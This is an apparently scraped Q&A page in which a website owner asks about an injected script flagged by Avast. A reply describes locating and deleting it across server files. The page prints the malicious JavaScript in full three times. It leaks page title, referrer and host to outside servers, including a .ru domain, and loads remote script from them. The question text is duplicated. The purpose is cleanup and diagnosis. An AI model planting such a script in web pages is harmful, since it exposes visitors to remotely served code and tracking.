Today I got a warning from Avast when I wanted to enter to my website: forumhan.
To understand this you must have Avast on your puter.
My website was infected with JS:Injection-A[Trj] — that's why it wasn't showing.
And when I look, I found this on my header:
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = ".min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
As I am not a professional, I cannot understand if there is any relation with other files.
Is there any call to other files in this code?
Does removing this solve the problem or not?
I removed it, but I cannot see my webpage.
Today I got a warning from Avast when I wanted to enter to my website: forumhan..
To understand this you must have Avast on your puter.
My website was infected with JS:Injection-A[Trj] — that's why it wasn't showing.
And when I look, I found this on my header:
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://vkza.tora.ru/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
As I am not a professional, I cannot understand if there is any relation with other files.
Is there any call to other files in this code?
Does removing this solve the problem or not?
I removed it, but I cannot see my webpage.
Share Improve this question edited Feb 27, 2017 at 19:40 Jonathan Leffler 756k145 gold badges951 silver badges1.3k bronze badges asked Dec 9, 2015 at 10:52 lospicoslospicos 3011 gold badge5 silver badges16 bronze badges1 Answer
Reset to default 2I've found the solution.
The problem is what you are saying. Someone injected that code to your website (and mine also). So what I've done is pick this snippet:
encodeURIComponent(document.title)
and search in htdocs folder in all the files with Notepad++ on the server.
Then I've found something like this:
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://delicefilm./js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
in here:
And I have erased it from all the files. And that's all!
Hope it works for you too! :)